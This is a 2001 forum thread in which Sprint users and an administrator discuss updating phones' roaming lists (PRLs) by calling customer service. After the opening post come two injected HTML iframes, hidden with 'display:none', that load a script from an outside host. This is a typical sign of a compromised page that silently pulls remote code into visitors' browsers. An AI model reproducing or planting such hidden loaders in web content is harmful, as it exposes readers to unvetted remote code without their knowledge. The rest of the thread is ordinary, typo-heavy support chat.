+ Reply to Thread

Sprint cell towers software

I assume that Sprint stores will be equipped to upgrade the phone/towers software. It seems so natural, however, that this would be available for us to download and synch to our phone. Anyone know anything about either how this software works or if there are any plans to do this. This may be the most important software upgrade out there since it fundamentally affects the quality of our phone service.

Relatedly, does anyone know how we can check to see if the current software is actually the latest version?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Can you expand a little on what you are talking about? If you are talking about Sprint's upsoming 3G network, the I300 will be backwards compatible with the network but unable to utilize any of its important features (144 kbps, increased battery life, etc).

Last edited by Marty; 11-12-2001 at 08:22 PM.

Administrator

Arrow

marty,

he means if we can upgrade the roaming and PRL lists in the phone.. currently, you cna do this thru sprints *4 code.. but they wil have to set you up to receive the updates...

ahhh....it's all so clear now

I'm new to Sprint (just switched when I bought the i300) and do not know what you are talking about. Please explain. Thank you.

Yeah, how do you go about upgrading this software you are talking about and what does it do? Thanks!

Administrator

Arrow

these roaming lists or "PRL's" are sotred in your phones programming area. when you "roam" from city to city (your still on sprints network, you are not in your HOME area" the towers will "see" your roaming lists and allow you to use the network.. also, if you have your phone set up to roam OFF the sprint network, these lists will tell the phone which carriers it can use.

if you feel you need to update your PRL's and such, then call *4 and tell them thats what you are calling about.

when sprint puts up a new tower, a new list is generated..

when they are going to update your lists they will tell you to stay on the phone and dont habg it up until the system does it foryou.. then your prl's are updated.. nothing you have to do..

hth!

I've talked to 2 reps now who tell me I have to get updated at the store -- and also told me that my software has been updated.

Administrator

Arrow

no doubt we probaly have the latest updates phone and paplm wise... but as for the TOWER lists.. you can get those thru *4.. i have done it before!!! perhaps the worng terminology is bein used here...

Question

I just dialed *4 and didn't find an option to update my PRL.

Can you provide additional info?

Do I need to speak to a customer service representative before this option is enabled?

Thxs,

Sam

Administrator

Arrow

Do I need to speak to a customer service representative before this option is enabled?
    yes.. sorry if i didnt make that clear... yuo just cant simply call the number and it automatically ddoes it..

you call the rep and explain to them you are getting numerous dropped calls and you are calling to get the latest cell tower updates.. they will explain what wil happen and yousimply stay on the phone until the system HANGS you up... the rep will explain this to you though..

but, iim pretty sure we have the latest versions and when you call them they will know what phone your on and they wil let uyo know....

And you actually dial *2, not *4, and you have to talk to Sprints stupidest thing yet, Claire, the electronic sprint representative (even though she is probably just as helpful as a real epresentative), eventually if you push her enough, you can talk to a human, but when I called they didn't know what I was talking about (big surprise).

Administrator

Arrow

ok.,. *2.. *4... my bad...

*2 is cust service and*4 checks your remaining minutes, etc...

if you want to tell claire (which looks pretty good on the sprint page) you want to speak to a human, then say "customer service" twice...

after the first "cust.. " she will say.. "ok, but first let me get.." then you cut her off and say "cuts.." again... she will then say "..ok.. let me get you someone.."!